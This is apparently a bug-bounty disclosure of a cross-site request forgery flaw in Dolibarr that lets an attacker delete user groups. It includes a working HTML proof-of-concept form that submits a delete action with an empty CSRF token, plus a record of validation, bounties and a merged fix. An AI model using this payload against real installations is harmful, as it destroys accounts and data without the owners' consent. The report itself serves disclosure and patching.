Cross-Site Request Forgery (CSRF) in dolibarr/dolibarr

Valid
Reported on Jul 18th 2021

✍️ Description

Attacker can Delete each Group with CSRF vulnerability when the Admin or SuperAdmin click on PoC.html file, it is enough to attacker know the Group id on server that start from 1.

For bypass your CSRF token, I just delete token parameter value and set in nothings as you can see in "<input type="hidden" name="token" value="" />"

🕵️‍♂️ Proof of Concept

// PoC.html


<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.75.10/user/group/card.php">
<input type="hidden" name="id" value="4" />
<input type="hidden" name="action" value="confirm&#95;delete" />
<input type="hidden" name="confirm" value="yes" />
<input type="hidden" name="token" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


💥 Impact

This vulnerability is capable of Delete users with one click.

We have contacted a member of the dolibarr team and are waiting to hear back 8 days ago
Laurent Destailleur validated this vulnerability 6 days ago
amammad has been awarded the disclosure bounty
$40
The fix bounty is now up for grabs
$10
Laurent Destailleur confirmed that a fix has been merged on 08e06f 6 days ago
Laurent Destailleur has been awarded the fix bounty
$10